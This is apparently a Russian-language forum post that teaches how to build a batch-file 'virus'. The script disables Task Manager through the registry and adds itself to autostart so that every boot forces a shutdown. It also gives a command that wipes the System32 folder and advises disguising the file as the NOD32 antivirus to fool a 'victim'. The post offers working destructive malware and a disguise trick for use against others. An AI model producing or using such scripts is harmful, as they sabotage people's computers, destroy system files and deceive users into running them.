Вирус на отключение. (сечёт тока каспер и Ad-Aware) )
Вот захотелось написать. Блокируем курсор. Надо полазить в папке System32 и вот что я нашлось: файл shutdown.exe- он выключает компьютер. А если создать батник и писать там вместо Shutdown /s /t 0 —
start shutdown.exe
Конечно это не лучший способ, но если мы маскируемся под какую-то программу?
А можно вообще удалить этот файл! Но что будет? Создаем батник пишем:
del C:\Windows\System32\shutdown.exe
Вот весь код:
@echo off
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v 011 /t REG_SZ /d C:\Windows\Nod 32.bat /f >nul
start shutdown.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Объясняю все по строчкам:
@echo off
Эта команда отключает вывод команд в досовское окошко.А эта:
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul
Запрещает диспетчер задач.
Так дальше:
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v 011 /t REG_SZ /d C:\Windows\Nod 32.bat /f >nul
Добавляемся в автозагрузку.И последняя команда:
start shutdown.exe
При запуске ярлыка компьютер будет отключаться. Там еще много всякого добра в этой ситемной папке:System32
А если её отчистить?
del %systemdrive%\Windows\System32 /q /s /f
Не повезет нашей жертве. А и ещё нам в папку с вирусом надо добавить файл shutdown.exe и иконку под которую мы будем маскироваться например я выбирается антивирус Nod 32. Ладно всем пока, спать пойду.
Комментарии